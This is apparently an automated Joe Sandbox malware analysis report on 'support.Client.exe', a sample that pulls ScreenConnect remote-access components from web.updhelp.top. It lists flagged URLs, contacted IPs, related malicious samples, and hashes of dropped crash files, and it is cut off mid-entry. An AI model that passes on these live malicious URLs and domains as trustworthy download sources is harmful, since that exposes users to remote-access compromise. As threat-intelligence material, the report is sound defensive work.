                                                    https://scripts.sil.org/OFL)dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.edfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://web.updhelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pilwerui.rchelp.topPFI5AX1V.log.2.drfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://web.updhelp.top/Bin/ScreenConnect.ClientSedfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.w3.ordfsvc.exe, 00000002.00000002.3921451450.000001C1E3E66000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E3F04000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3150371790.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://cacerts.digicert.cdfsvc.exe, 00000002.00000002.3921451450.000001C1E3D49000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://upx.sf.netAmcache.hve.5.drfalse
                                                          		high
                                                          https://web.updhelp.top/Bin/ScreenConnect.Client.manifestYdfsvc.exe, 00000002.00000002.3932098452.000001C1FC69D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://web.updhelp.top/Bin/ScreenConnect.Winddfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://schemas.microsAdfsvc.exe, 00000002.00000002.3935908647.000001C1FEE8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://web.upHzNdfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exe.config_dfsvc.exe, 00000002.00000002.3937485355.000001C1FEFEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://github.com/microsoft/cascadia-code/blob/main/LICENSE).dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://web.updhelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicationScreenConnect.WindowsClient.exe, 0000000F.00000002.3150518028.0000000000CE3000.00000004.00000020.00020000.00000000.sdmp, PFI5AX1V.log.2.drfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://web.updhelp.top/Bin/ScreenConnect.Client.applicationScreenConnect.WindowsClient.exe, 0000000F.00000002.3149557783.0000000000ABE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://web.updhelp.top/Bin/ScreenConnect.Client.applicationPScreenConnect.WindowsClient.exe, 0000000F.00000002.3150883243.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3150883243.000000000298F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.carterandcone.comldfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exXdfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.fontbureau.com/designers/cabarga.htmlNdfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://web.updhelp.top/Bin/ScreenConnect.Client.applicationLW6.VGOjdfsvc.exe, 00000002.00000002.3935451395.000001C1FEE43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                http://www.founder.com.cn/cndfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.fontbureau.com/designers/frere-jones.htmldfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.jiyu-kobo.co.jp/dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://web.updhelp.top/Bin/ScreenConnect.Client.applicationdb01kScreenConnect.WindowsClient.exe, 0000000F.00000002.3149557783.0000000000ABE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.2.drfalse
                                                                        		high
                                                                        https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exdfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManag(dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        http://www.fontbureau.com/designers8dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://web.updhelp.top/Bin/ScreenConnect.dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          http://scripts.sil.org/OFLdfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstagedfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            https://github.com/microsoft/cascadia-code/blob/master/LICENSE).dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              104.21.48.239
                                                                              		web.updhelp.topUnited States
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              217.156.123.36
                                                                              		pilwerui.rchelp.topRomania
                                                                              		15882ASMMCPiataUniriinr3ROfalse

                                                                              General Information

                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                              Analysis ID:1663841
                                                                              Start date and time:2025-04-12 17:56:49 +02:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 6m 31s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                              Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                                                                              Run name:Potential for more IOCs and behavior
                                                                              Number of analysed new started processes analysed:23
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:support.Client.exe
                                                                              Detection:MAL
                                                                              Classification:mal63.evad.winEXE@22/66@2/2
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, SystemSettingsBroker.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 172.64.149.23, 104.18.38.233, 23.4.43.62, 20.42.65.92, 199.232.210.172, 20.12.23.50
                                                                              • Excluded domains from analysis (whitelisted): crl.edge.digicert.com, crt.comodoca.com.cdn.cloudflare.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e3913.cd.akamaiedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, crt.comodoca.com, cac-ocsp.digicert.com.edgekey.net, watson.events.data.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, ocsp.edge.digicert.com, blobcollectorcommon.trafficmanager.net, wu-b-net.trafficmanager.net
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              11:57:54API Interceptor1384900x Sleep call for process: dfsvc.exe modified
                                                                              11:57:54API Interceptor1x Sleep call for process: support.Client.exe modified
                                                                              11:58:01API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              No context

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              bg.microsoft.map.fastly.netjre-8u441-windows-x64.exeGet hashmaliciousUnknownBrowse
                                                                              • 199.232.210.172
                                                                              jre-8u441-windows-x64.exeGet hashmaliciousUnknownBrowse
                                                                              • 199.232.214.172
                                                                              AxgHj313r7.exeGet hashmaliciousRhysida, TrojanRansomBrowse
                                                                              • 199.232.210.172
                                                                              Dd73LmElYt.pptGet hashmaliciousUnknownBrowse
                                                                              • 199.232.214.172
                                                                              Dd73LmElYt.pptGet hashmaliciousUnknownBrowse
                                                                              • 199.232.210.172
                                                                              GSRuGK48Ex.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                              • 199.232.210.172
                                                                              rxm.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                              • 199.232.210.172
                                                                              tb.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                              • 199.232.214.172
                                                                              yap.batGet hashmaliciousKoadicBrowse
                                                                              • 199.232.214.172
                                                                              pilwerui.rchelp.topSecuriteInfo.com.W32.Lolbas.A.tr.24535.1660.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                              • 62.182.86.176
                                                                              SecuriteInfo.com.W32.Lolbas.A.tr.2882.8256.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                              • 62.182.86.176
                                                                              SecuriteInfo.com.W32.Lolbas.A.tr.13154.23639.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                              • 62.182.86.176
                                                                              SecuriteInfo.com.W32.Lolbas.A.tr.2882.8256.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                              • 62.182.86.176

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUSQuarantineMessage.zipGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.16.117.116
                                                                              https://webshuaw.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 162.247.243.29
                                                                              SecuriteInfo.com.Win32.MalwareX-gen.25317.7450.exeGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              SecuriteInfo.com.Win32.MalwareX-gen.25317.7450.exeGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              M605aSgwAR.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.21.91.46
                                                                              ZcvUiE3Wl5.exeGet hashmaliciousUnknownBrowse
                                                                              • 172.67.166.185
                                                                              M605aSgwAR.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.21.91.46
                                                                              mgm202589670875i456u356235734742256869909145454ki953323467578676097.scr.exeGet hashmaliciousCobaltStrikeBrowse
                                                                              • 104.21.9.149
                                                                              https://u1.verdictaffidavit.shop/lzoqsyrqui.aacGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.21.112.1

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exesupport.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                support.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                  ZoomWorkspace.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                    ZoomWorkspace.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                      Microsoft-Outlook-DocumentPDF.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                        ReceiptApirl2025Pdfc.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                          VCredistx86.msiGet hashmaliciousScreenConnect ToolBrowse
                                                                                            VC_redist.x86.msiGet hashmaliciousScreenConnect ToolBrowse
                                                                                              tool.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exesupport.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                  support.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                    ZoomWorkspace.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                      ZoomWorkspace.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                        Microsoft-Outlook-DocumentPDF.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                          ReceiptApirl2025Pdfc.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            VCredistx86.msiGet hashmaliciousScreenConnect ToolBrowse
                                                                                                              VC_redist.x86.msiGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                tool.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                                                                  Created / dropped Files

                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_support.Client.e_e969dd32b9a912a80d058d62badf6e0b4bb6f68_17d7ea9a_743ee4f8-75ce-41d4-9ac1-c100b4b8aab2\Report.wer

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (2251), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):1.234826158067318
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:tJ+KBiy0BUvXqAjxCKuu7FN14lrJuoCm+pgx8M:bdBi5BUvXqAjHuu7FN14lrJVGlM
                                                                                                                  MD5:3566D90BA30CEE30A180BFCDF96D9966
                                                                                                                  SHA1:8DCCD2B6E4E0F59B164F577E91D7A7859A9A768A
                                                                                                                  SHA-256:9FF486A90B924B2A8548532FD5F426F3CFE82DB6B0D11F73FB1219209782520A
                                                                                                                  SHA-512:B8F48C185C4BE2810E189E51610DB9C78452E75CC688910E05126B929ADE302A06AA297D7646ED6079E2F7BBF7579AEB5767FD424350CF49FDAB8087D6104B29
                                                                                                                  Malicious:false
                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.8.9.4.7.0.7.5.9.1.5.0.5.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.8.9.4.7.0.7.9.1.6.1.0.5.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.4.3.e.e.4.f.8.-.7.5.c.e.-.4.1.d.4.-.9.a.c.1.-.c.1.0.0.b.4.b.8.a.a.b.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.0.4.f.b.9.b.-.0.4.8.f.-.4.6.8.a.-.9.6.c.c.-.0.8.0.a.9.6.9.b.9.7.5.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.u.p.p.o.r.t...C.l.i.e.n.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.3.c.4.-.0.0.0.1.-.0.0.1.3.-.8.8.8.6.-.d.4.a.6.c.3.a.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.7.d.f.d.6.3.8.3.4.0.6.7.1.0.9.0.c.2.c.5.9.5.9.c.0.1.1.b.e.d.b.0.0.0.0.f.f.f.f.!.0.0.0.0.6.5.8.8.e.2.1.9.5.5.b.e.0.1.f.6.7.3.9.2.7.3.6.5.a.5.6.e.f.7.8.3.d.f.d.2.5.7.5.c.!.s.u.p.p.o.r.t...C.l.i.e.n.t...e.x.e.....T.

                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER.3cd79a44-ae35-4b07-aa4c-b6d4d3f52166.tmp.dmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Sat Apr 12 15:57:57 2025, 0x1205a4 type
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):115062
                                                                                                                  Entropy (8bit):1.2825431722851528
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:n+uAZR7cqmBWNu1ZXdFOKtdaA71xPKVrgqmFC53K6SLNV4DtuH/7Dwp1kTA1/W3K:NEckUZXaKtd37Tgrg1yNxQ/7Ti8LL40
                                                                                                                  MD5:EEC80784509364CE2FE94F582D62C1D2
                                                                                                                  SHA1:14349B403648CAC4171B8E35042DCABDB4B3D6FB
                                                                                                                  SHA-256:B59525D22D434E6D8A0A3AED0564E1DD2A704E6862D18CB5B992B3DD2DD4B27D
                                                                                                                  SHA-512:6AFBDCF85B0B24F82C60217A6637D0922A162982B0157B4A1B7D578DAEC31360035CA547A32C6621BAB11A284625E34EF0902C5E67D74F2D18DBB05A4036119F
                                                                                                                  Malicious:false
                                                                                                                  Preview:MDMP..]..... ..........g........................(...............J;..........T.......8...........T...........`#..........................................................................................................gX......8.......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................2.2.6.2.1...1...a.m.d.6.4.f.r.e...n.i._.r.e.l.e.a.s.e...2.2.0.5.0.6.-.1.2.5.0...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER.3d6ef391-5ae1-4424-8e46-8de1de284c27.tmp.WERInternalMetadata.xml

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8412
                                                                                                                  Entropy (8bit):3.6958967664976696
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:RHl7CwNzaOa4q6O6lj6Y0iSUZMgmfLpidprv89bFGTsfgD3cm:RHlnNzaOa4O6B6YBSUCgmfLpiwFG4fgd
                                                                                                                  MD5:C83E5FF080D1823C35CCEB31AABF8853
                                                                                                                  SHA1:8A88EF26867ED8CD9B1312B9A8DF9C3B57E41201
                                                                                                                  SHA-256:D8FCB52B7882C4B7734F0F4A44701A34E134625AA6A0CA8DCF56342B4606B434
                                                                                                                  SHA-512:DB7ED0BBE2B55A5D9D25E75C565935553EDC0FB857915F586F4FA1D909196D6DCCA1AD85D95B833271663FE10FA35A8FDA809FF54889B498C51D6319F4187EBC
                                                                                                                  Malicious:false
                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.2.2.6.3.1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.2.2.6.2.1...4.1.6.9...a.m.d.6.4.f.r.e...n.i._.r.e.l.e.a.s.e...2.2.0.5.0.6.-.1.2.5.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.4.1.6.9.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.........<.B.u.i.l.d.L.a.y.e.r.s.>.........<./.B.u.i.l.d.L.a.y.e.r.s.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.

                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER.3de363bc-06f6-42d1-bc1a-401eeec774d3.tmp.txt

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):13340
                                                                                                                  Entropy (8bit):2.686008804266502
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:TiZYWUzu0OSlzY2YMWK5bH1YEZcQ7tk0iveS5F7w3qf6FaMUFM8gDINo3:2ZDytzhB5f42qoaMUFM8gMNo3
                                                                                                                  MD5:A94B7189188EBA7C01F82B8FB5CD3FAE
                                                                                                                  SHA1:8978D9D5821460B7CDAB681C61EE7405AB8F51F4
                                                                                                                  SHA-256:AD7E960B48CE12048626A60057E5246A76AF7616C4DA4D09E6C6A61F8963800A
                                                                                                                  SHA-512:73B5C7690F53139840822BCF4B2174FC383A9DB68883687D2106B82A13403C06480147C9011566FFF7E7B67144C8CB8F9CC8929AC05B76EF452E3878F397E526
                                                                                                                  Malicious:false
                                                                                                                  Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER.5477cf57-911e-4d7e-886c-6fc5c094a050.tmp.csv

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):50176
                                                                                                                  Entropy (8bit):3.052093710895245
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:4V9UaWD7xyPwn07tt5BccltKFaVwLZdjn8mfO3:4maWD7x0C07EcloFJnj8gO3
                                                                                                                  MD5:17C17946826492E77CFE72D0D1C39037
                                                                                                                  SHA1:18A53D0DB127793910534DFD322ECC37809D83BF
                                                                                                                  SHA-256:F1E85F42050DF60A437E4012C127F758EDBE616F7E7E0F33F81AC3D2930794B8
                                                                                                                  SHA-512:5E2F330C6CEADACE34A60686255C824A0F6641D029A5D0DA744C2C0AF43AB6E8A60B26CC63CED3C970D86DF8FFBC2F5EBA7E76E447B40A53FF1AE37CBBB0DD57
                                                                                                                  Malicious:false
                                                                                                                  Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER.f9851a8d-9600-4584-aa25-3c1ce30f5616.tmp.xml

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines (2272), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):7338
                                                                                                                  Entropy (8bit):4.837892027999722
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:uIyqy64+VM1HyL3/g9eT8OpByO7MsT5VDk9cadsfHOnVsyy5ze+:NX2ZVu5ze+
                                                                                                                  MD5:64EE8639E6ABB5F1DE6FCF3BA5EEF977
